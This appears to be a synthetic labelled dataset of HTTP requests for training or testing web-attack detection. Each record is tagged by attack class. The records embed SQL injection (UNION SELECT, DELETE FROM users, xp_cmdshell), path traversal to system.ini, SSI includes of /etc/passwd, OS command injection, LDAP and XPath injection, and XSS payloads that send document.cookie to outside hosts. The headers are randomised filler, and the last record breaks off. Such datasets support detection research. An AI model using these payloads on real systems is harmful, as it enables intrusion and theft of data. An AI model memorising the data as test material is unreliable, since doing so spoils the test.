UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4241x2926
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: compress
Upgrade: zes4g/0.4, bti/7.1
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 94769568584
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42073
Start - Id: 39620
class: SSI
GET /sUZeRzCk4SS8/khtacces870JD0Iam/nXFG.jpg?tn_nQk88Id1=50323062&u0yrsnufrls=le&ca34A=dm&d5u=L&boiwl=aretlessm%5C+au&ca6ech3ohet=tNVRNxt9r&tobrgou=%24passthruDboot.ini7rjci&ulF6wtdiorrfge6=7&oxy=8nyeraincl4&le7tc=%3C%21--+++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&nriuj=17220&Bpfpah8e9c=3094&A7=759 HTTP/1.0
Host: 155.29.4.96:1356
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese, us-ascii, x-mac-japanese;q=0.7, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 79.170.36.207
Cookie: eoae=ielressp0neabie;arluuatoci=50554992;nEgrutFsadKo=nHb;Tcams=0rlrtoecaolqbhtcm;eolasnnrt=did;w@lCSuG8GTX@=ySDD9
Cookie2: $Version="78"
Date: Sun, 29 Apr 07 23:50:39 UTC
ETag: "KavC@_wPi-4xbzsb"
Expect: ocbQeoPi=rapwe;1eeb=ek8iwt
From: ts3vhh@kqzfn.com
If-Modified-Since: Wed, 01 Oct 08 17:21:22 GMT
If-Unmodified-Since: Mon, 08 Jan 07 21:00:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6000
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: t7Ca dthiOsnp=enpbG
Authorization: Digest response="80ED7f1eeBb8A0AEa6E9F90FED316EBa"
Range: 973-,-4,32221-
Referer: http://www.e3ie.st/aoeoupg.nsf
TE: chunked;q=0.4,deflate,trailers
Trailer: Accept-Language
User-Agent: exedodsw (fE6xI8y; hIJJ.pES_; lgo2K2qL; r62.08J; uYNZ.y)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 0.8 www.weFo5r7.jpg
Transfer-Encoding: oraN
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39620
Start - Id: 41745
class: SqlInjection
GET /rVSBFD@4GqZ1I3r/CSURGoMk/hLxvgF7NzR-jMQ0bxNd5/rNXs4jHd-A/7ikwoiid5ndvEtttmja/3ocnH/7OWOtWsDbodypBNbz/hpiqZBXCPu9.sh?iyng=nbrnsTnOsctyo&0ace1=iiE&rqlola=unperlnsetEm2eom%3Esrbh&IEDpasswd=6494&Dxhnebavl2Heyu=%27%29+UNION++ALL++SELECT+++21++++FROM++++sAi6rntet++WHERE++++%28+%27%27%3D++++%27&JDHl=fromgle1%3E&ernfDctnPbw=t3cltfraseof HTTP/1.1
Host: www.DcSniOs.cz
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-age=469
Client-ip: 141.207.49.218
Cookie: bea=15
Cookie2: $Version="2"
Date: Wed, 19 May 04 08:21:41 CET
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: ih2Wcxj
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Mon, 10 Nov 08 10:36:46 CET
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "Qb3J5Ez19jpJNWFv2K"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 053
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic T2lvaW5zMzpubmFmbA==
Range: -69404,-1
Referer: http://hnejuf.be/aOneoe9/oeeeeh/rboxi.jsp
TE: trailers
Trailer: TE
User-Agent: rdetzmaat6/0.7
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: truans/0.5 www.aedhm.gif, 8.8 www.WafeAin.html:76873, HTTP/7.6 5.8.6.135
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41745
Start - Id: 45642
class: PathTransversal
GET /50b/9zhtIhntkIs/ozUla3Yhq_IOj4tdU5/sa.pl?qeoRos29wiyx7b=tnava2%29%3Eq&ttdanih2u=249332&szoERjc=0&sitEreste=erbliolB%7Evel&c7in5raupyg=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&aa8r=p3759uD&nojEmoetia6iCN=nr HTTP/1.0
Host: 226.198.223.132
Connection: keep-alive
Accept: application/postscript;q=0.0, image/*, text/xml
Accept-Charset: euc-jp;q=0.3, x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=31550
Client-ip: 168.189.41.184
Cookie: E_Z@M3OXol=3343;hrl1erunlpryl=3t1digyutetetonen;JRJimgbChS=25504;3soivleeawlioo=veoEw
Cookie2: $Version="85"
Date: Wed, 23 Mar 05 06:26:27 CET
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Tue, 09 Oct 07 13:54:33 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Dec 08 15:47:27 GMT
Max-Forwards: 28
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: eorEfg ittSh=d8tksla
Range: -5753
Referer: /hsnei/nitoeu/diAw.mpeg
TE: trailers,deflate;q=0.1,trailers
Trailer: Upgrade
User-Agent: aa8onton71/2.2.9
UA-CPU: Sparc
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/6.5 215.46.70.8
Transfer-Encoding: gsiixo; e4p1Oied=mryD
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45642
Start - Id: 41016
class: SqlInjection
PUT /iiRYFO8zCym9yx/leae0qjc/5ttmpeaN.jpeg? HTTP/1.1
Content-Length: 211
Content-Language: tsmtosir,asuatno
Content-Encoding: compress
Content-Location: /tgwufteO/elfUe/slRrpA.js
Content-MD5: ZWZubm5iZG5lbkFqbjh3Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Jul 06 14:15:41 UTC
Last-Modified: Fri, 20 Jan 06 04:12:01 GMT
Host: www.eWsyoehen.st
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.0, iso-10646-ucs-2, windows-1255;q=0.1, iso-8859-2;q=0.3, windows-1258;q=0.1
Accept-Encoding: compress;q=0.4
Accept-Language: to816sjc-ittlgo;q=0.7
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: yrOfa4=81;hs4oLqtmruiempw=ztugm7onlSma3e;anwa3Ts=tuf4;hnxt=to;TFftpQjilWZ=eyeitermu
Cookie2: $Version="131"
Date: Sun, 01 May 05 24:25:51 GMT
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eddo4bhd@tahahlyhn9.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: "7Y5IP_-jwtjDSFv"
Max-Forwards: 13
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: esnih onsrelh6=edcoaa9g
Range: -388
Referer: /awahb/8zmEpae.avi
TE: deflate
Trailer: Expect
User-Agent: Mozilla/5.0 (compatible; Konqueror/2.5; SunOS sun4u; goes0s; nemeHerrd; 2cgwan)
UA-CPU: x86
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: 7.6 www.ilIrsep.jpeg:023, bbLl/8.7 www.e0dr.gif, HTTP/3.0 123.191.207.254
Transfer-Encoding: identity
Upgrade: rhn/5.7, rco2/7.4, ebrn/2.9, n0ek0/3.4
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 190.76.80.54
X-Serial-Number: 3513776009500054162
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hNoCob=zCcyuYrTk_0&ree9=soa&whgogeeAcEnx=8461723688&dePlze=2&aceqjjni=n&xfws=1999&anitaatrmtiibr=xocsonlcyft&bdecywu=<t&9AZzzXshutdownmay=30608&xl9rxuX9rcr=exec xp_cmdshell    '"er"  >> script.vbs'

End - Id: 41016
Start - Id: 40420
class: SSI
POST /R_IkFx/t1B4ueQuuQDe/eYtV/mEiaoHbTUFbna/crtfttTela/eaW/nFi8Bv.O/re6nore/uowalm7/eirbhngtdwGms/matseafs.jpeg? HTTP/1.1
Content-Length: 88
Content-Language: cRterhe,1ldie
Content-Encoding: compress
Content-Location: /d3Ia03/a2baEhss/scabxhhI/nrfeegbe/gmatsovd.nsf
Content-MD5: a2hjdDlnY2RFaHQxZXN0RA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Wed, 06 May 09 14:12:05 CET
Host: 250.162.244.164:80
Connection: rdadmHea
Accept: application/*;q=0.0, application/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, deflate;q=0.3, identity;q=0.9, gzip, gzip
Accept-Language: *;q=0.2
Cache-Control: max-age=82
Client-ip: 53.36.147.11
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="57"
Date: Wed, 13 Dec 06 24:22:13 CET
ETag: W/"yUqutrDS@dr3nWVh3x"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Mon, 20 Mar 06 22:33:06 CET
If-Unmodified-Since: Wed, 27 Oct 04 01:38:36 GMT
If-Match: "MZS7axyKfcMF7l_CPa"
If-None-Match: "HmVZJ-9eY5pn_FNM.9"
If-Range: *
Max-Forwards: 48
MIME-Version: 6.8
Pragma: nn9=t6rl0reu
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic cnlpbTM6bmlycmVF
Range: -687,0114-940064
Referer: http://www.e7sa.de/teuge7.png
TE: trailers
Trailer: Accept-Encoding
User-Agent: oiooes3oro/6.3
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 808x844
Via: 0.3 158.158.244.222
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 538 222.86.10.146 "Etlso9Shinasieza" "Sun, 13 Jul 08 18:44:23 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ogo92d4optMP1b=<!-- #include virtual="d:\windows\autoexec.bat"   -->

End - Id: 40420
Start - Id: 45576
class: PathTransversal
GET /n1ilg_rUG8SXx77/eh7E5enityMigmEru/r96D.qRAjzEJa/ptxipibbal/1leiin3nroh/i9chhdpoc9Btsa/iAbJ0c7a2pMUu7/nFjBf34QN9W/uMrJ@F118bt9KutuTa/aretitia/mv3/459PdRoope06eer.asmx?tiahwrtau=w7Ea&ihleonAHmEfug=l1ewinnt%26%3A&o6ewhi4rpy=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fngsindst%2Fon%2Fmaveanil%2Fas.jsp&4Tgt.zd=clegedlsmi&lOdehHE=yhlt&udneoHHcEmr=alndysdhEsA&pdDsplin3=d&ontuaetcc=ynNG6-CNyHX&aodu1sehanurre=ntee HTTP/1.1
Host: www.tcrtpmgses.net:5920
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: 1s-e;q=0.6, l-nz;q=0.4, hfitdse-tt, dlW4re-Hoehar, vl-noytrt;q=0.7
Cache-Control: irauirtn=oea7e4vn
Client-ip: 210.46.171.191
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="74"
Date: Fri, 12 Oct 07 05:52:22 UTC
ETag: "7BJnOXhoOC90uhha"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: wtdlbok@elsFbheed.st
If-Modified-Since: Fri, 11 Jan 08 06:43:34 GMT
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "jBnDMQIbJ0PUai2Hd5"
If-None-Match: *
If-Range: *
Max-Forwards: 1633
MIME-Version: 2.5
Pragma: jsa='tonrS'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: e6tih ntad3xr=rahhyp
Range: 286-378831
Referer: http://www.nhiat.uk/droaettM/dylSuw6e.txt
TE: chunked,gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 7.1; 98-tc; rv:3.1.9) Gecko/58091649
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: identity
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45576
Start - Id: 47300
class: XSS
GET /ne9meqepmdvmnarlo/iUn/mvu4NApXuxo7ym/91D2styleo/dZr1JpyY/tg/rxUTlX2bcPdg@SrL-c/0CZUQWCxUO92/yotfetoEm7oeatjsdi/rbuexesumhArjr/1lEdterte/45oiersepnetEo7oc.gif?eErntryFrtrcro0=%3Cstyle+++type++%3D%22+++text%2Fjavascript+++++%22++++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.naarnd.com%2Fcgi-bin%2Fsitens.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle++++%3E HTTP/1.1
Host: www.trxfesc.ch:1
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253, windows-1255, iso-8859-8, x-mac-chinesetrad, x-mac-roman
Accept-Encoding: *
Accept-Language: ai-e;q=0.3, ozuv-hcO, heibh-ioH;q=0.8, minsj-hica, w1-o;q=0.0
Cache-Control: no-transform
Client-ip: 233.170.70.151
Cookie: pyeklliidsbTRTt=rrrseTemxbodaoozt;ecUt=aota;aUarfp=oeR;0jgujA70RG.V=5852517307
Cookie2: $Version="1"
Date: Mon, 13 Jul 09 19:42:33 CET
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: scSR=iog8
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Sat, 10 Jun 06 07:57:02 GMT
If-Unmodified-Since: Sun, 26 Jun 05 06:31:06 GMT
If-Match: *
If-None-Match: "dBzCBVvvijut.5H"
If-Range: Mon, 05 Oct 09 18:17:20 GMT
Max-Forwards: 105
MIME-Version: 0.1
Pragma: lrs9et=yr0Ioh
Proxy-Authorization: Digest realm
Authorization: NTLM ZUF0YWVTd2VkdG00aXRiYjNpb2VjTmV0YXRpdXR0b3VhdVN1emR0VA==
Range: -89369,6240-653,-318718
Referer: http://8uhf.gov/shLir/dvehaxae/7inmateh.jpg
TE: gzip;q=0.4
Trailer: Transfer-Encoding
User-Agent: f8XLly http://www.pfeuis.org
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: lat/7.5 167.34.141.101
Transfer-Encoding: ahyUR
Upgrade: oHe/1.6, eamo/6.1, cf3S/3.9, 9bsdr/6.5
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 191.181.15.2
X-Serial-Number: 1360027
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47300
Start - Id: 36110
class: PathTransversal
GET /iyprocessing-instruction8M0.php?sg422Ata=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&r4en=84707075&sfk=5055685 HTTP/1.0
Host: 242.98.184.173
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ewluOs-splS;q=0.3
Cache-Control: no-cache
Client-ip: 100.85.62.104
Cookie: iodr4=aD363rFsXiq;7DPB5=193167453;7a5EohtdH=baatHetilikr<
Cookie2: $Version="163"
Date: Tue, 03 May 05 08:51:51 CET
ETag: W/"lwclySd@piARZiDF"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Tue, 19 Jan 10 22:55:23 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: "nJ9tQp2nihTpbxOCM8"
If-None-Match: *
If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: olSar aeLtea1=rEamvemh
Range: -9,08359-983,16084-76
Referer: /hs3ei/n6co4/btql/iSct.wmn
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: 6iTuea/4.1.4.2
UA-CPU: StrongARM
UA-Disp: 0150,960,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 001x200
Via: HTTP/0.2 69.137.81.216
Transfer-Encoding: identity
Upgrade: iormhs/9.8
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36110
Start - Id: 36897
class: LdapInjection
GET /s9/aatndTnsn8ahhn/aiV5pP/nip8A1YZ22QU4ydwR5K/eei63egeoewdbuenrj/Ishutdownq6bFimgVxp_/o-8jEW/sei/kxnBdshutdown/xypE_SEVBy9Ln.jpeg? HTTP/1.0
Host: www.sArhezevT.gov:80
Connection: seeqmitl
Accept-Charset: windows-1258, x-mac-korean;q=0.1, windows-1255;q=0.9, cp-932, cp-950;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: oeSton='Arq'
Cookie: esat2o=)  (   |   (displayName=had*)  (name=   had*  )( mail=had*)
If-None-Match: *
Max-Forwards: 7169
Authorization: dyik n3elsu5=YzlS7tt
Range: -3,-39
Referer: http://www.otnhiotn.fr/seko/hisiiAh/iisn.pdf
User-Agent: btecx9o2nn/8.5.8
X-Forwarded-For: 230.164.181.20

null

End - Id: 36897
Start - Id: 41784
class: SqlInjection
GET /knoclhgtidkhte.gif?eeedrerrdt1hmm=n6ksaeoBdersoclyTh&FXMSbm=173150546&ctnRaso=ads%28&whplml1xgvyi0=eNeh6f7o6aaq&w9e=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F46056%2F**%2FFROM%2F**%2FMi%2F**%2FWHERE%2F**%2F%28+++%27%27%3D%27+++++%2F**%2F&llndxc2ea4=e3sock_streamwz&onztenso=teeay4sE HTTP/1.0
Host: www.umvullee.fr
Connection: keep-alive
Accept: video/*;q=0.8, image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: eux='b4N'
Client-ip: 19.38.3.115
Cookie: ipkRRstyle-OTlw=uoXYwj;ifl7itsw=56;wn6imierouwNna=6
Cookie2: $Version="3"
Date: Fri, 10 Nov 06 23:11:45 GMT
ETag: ".4g273Gu0e1YegQr"
Expect: cvnt=RiEntn
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: dciedsge='e1Rqe'
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: NTLM bjM2RWRicmNzY2xlZWVyclM5ZHNveTBiYnRjWFR0bm5CeWhl
Range: 4745-5836
Referer: http://www.DOlytYe.gov/wzw3gwe/lsfmt/pctbr/Eisqs.php4
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: iy6du/1.6.8.6.0
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: yswa/6.4
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41784
Start - Id: 35112
class: SqlInjection
GET /qq/tt2vsh4aifsy/dimnsonnV/erluhstrfnlaj1y/eHL1eg.shtml?emthuik=elg.FRg8L&rssfnraeuEn=122&eUad=5010259&coiseoethnotqwu=id%2Fg&ieser=7&ra=H&1ENq0azdsbetets=obtRma7&WGqaXTcFD7=705743173&uwti8ahvulv=44006&89=41798&ayae=sm HTTP/1.1
Host: www.mtpo.uk
Connection: keep-alive
Accept: */*
Accept-Encoding: 
Accept-Language: *
Cookie: ltsl2ccnb8n1tet=nitaejnuei'); DEL/**/ETE     FROM   users    WHERE upper(username)   =     upper('admin;eOemtsljaf3=r -n;dsos4d6oy=9;ee8afS=snEcAlclb;execc;wrefwno=ui
Date: Tue, 24 Jan 06 10:23:12 CET
If-Unmodified-Since: Fri, 27 Feb 09 14:33:19 GMT
Max-Forwards: 427
Pragma: hshh='O'
Referer: /OaRo/5eaih/yee8e/dgiciLes/R5iesslf.png
TE: trailers,trailers,gzip
User-Agent: Mozilla/6.2 (compatible; Konqueror/5.8; Windows NT; rodd; tfTat)
Via: 0.6 www.prSo.css, HTTP/4.2 www.nrsam.htm, HTTP/1.0 37.36.247.159:7
X-Serial-Number: 2453467353146

null

End - Id: 35112
Start - Id: 36823
class: OsCommanding
GET /nmU.qe_Elx/jW5/lf9SUdY5B/F0KB-AU@dpjcdQ.php4?cieo0tt=dscriptbhj5ed&Bocmdw=3%2BOae&lh6tX=ahowg&UyGaooh1biph=52&iH=ihN&vhm=3243489&Nepd=38264&So6jtLp=tIlteovBsh&ieiaswbuBctdnO=eeezQn&r6cragso=%27+++++%3B++++ps++++-aux+%3B&n2htNo=k6Fq&cD6hN3wtroeto=sd&hmTf=180341666&keuyeiDn=ntsee6e HTTP/1.1
Host: www.Onff.gov
Connection: 4ueTmyl
Accept: */*
Accept-Charset: gb2312, shift_jis;q=0.6, windows-1257;q=0.2, x-mac-roman
Accept-Encoding: *;q=0.1
Accept-Language: o1d-hl, E-nuarlutb, k-e;q=0.6, edkkHql-epdinr4
Cache-Control: max-stale
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="33"
Date: Sat, 14 Apr 07 05:04:47 CET
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Sat, 11 Aug 07 21:01:20 GMT
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: *
If-Range: Sat, 01 Jul 06 12:10:19 CET
Max-Forwards: 7
MIME-Version: 7.6
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: NTLM bFNsaGxsdXNxNG11SGYwMHNtM2xlaHNnZXVpcm5kb2VwbnptZE0=
Range: -95
Referer: /Eola/5e6inlR/ojatho2.cfm
TE: chunked
Trailer: If-Match
User-Agent: ndhN9d/0.2.8.1
UA-CPU: 68000
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.6 www.pthaf.png
Transfer-Encoding: identity
Upgrade: ehioe/8.2, aew/1.1, i8tRt/4.5, Ox2yni/4.8, 3seho/8.1
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36823
Start - Id: 47416
class: XSS
GET /aYyCx7jLVO/AnYDfHopen2andQv/4pjN99tmlinkLf16Y/home29EWstdin8JyDNA/MbId.icKQPdKlFT/Mungtotnhriuzt/on9hpv9S.qNrTfJm3mHJ/utteheun9corih7ueo/dcWkrz/eeBta4einudiho8/etdnnrfenainaa/i7JbjCCWH@jIyihV.e.tiff?gra4spos=%2BaoghtS%7Eagimgqme&lHhesee=%3Cimg+++src+++%3D%22+++livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ie.com%2Fcgi-bin%2Fisdeittire.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&oeaale7mt=aiA%26%2Bi HTTP/1.1
Host: 214.198.120.16:80
Connection: close
Accept: image/*, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: hNapd=asiii
Client-ip: 210.252.219.246
Cookie: Si1sjeogXo7=s|;tenahd9=n0d h7catho<and;rmpoeist3qrir=?erm
Cookie2: $Version="9"
Date: Fri, 16 Apr 04 08:24:21 UTC
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Mon, 27 Apr 09 01:49:36 CET
If-Unmodified-Since: Wed, 14 Jan 04 18:29:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 571
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM b25hZG9zZWhkeWhwdHZtcWVsaHQxZTl6TWZubGwzdmllV2F1YmM4dG5pYXZyYWVu
Range: 25658-9605
Referer: /hcuetna3/bGp0i/ate0bhw/2emaai/elcrad39.exe
TE: trailers,deflate;q=0.4,chunked
Trailer: If-Range
User-Agent: dtHef/1.7.6.4.6
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 3.9 www.loig.css
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47416
Start - Id: 49648
class: XPathInjection
GET /v8U/tm1UevMnq5jeritrm/z0MR2XCXDewIA.J/n5rqsnp48ueRo.shtml?fvA1vs6u-ruL=iTVKb_BHR&mapweso=Ci6&rlj=echudoaccess_logrdu&aotonLgctce=oExbVN3VLk&aacnti1d=RsarnsfNI5w2&oexuMlisxAou=%7Cb%29tn&zteui=6Oixnmed%27++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27dhyen%27+%3D++%27&LJML_s-vinputff=dteiiAi5e+e&iegTtrht=sioZBvd&oho=tyr1eusrden&ss6rrn=024607&auIdcprot=nfEO HTTP/1.1
Host: www.ni4dnNs.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate, identity;q=0.1, identity;q=0.5
Accept-Language: ratd-isPcAto;q=0.1, pdo-yoa4cn, t3-uslgfeB;q=0.8
Cache-Control: only-if-cached
Client-ip: 108.249.101.218
Cookie: 8lLsaw=492568;lhrysndlntsak=aPI.CuUbZUZy;N8LbjUE=tkgXFU
Date: Wed, 07 May 08 09:25:20 UTC
ETag: "arPv@_rQlS7TT1-_Zmr"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 09 Jun 07 06:29:22 CET
If-Unmodified-Since: Mon, 30 Jul 07 06:25:03 GMT
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "y@gyu40UFW2RU@gHub"
If-Range: "54AliGOt2q3.Goy1"
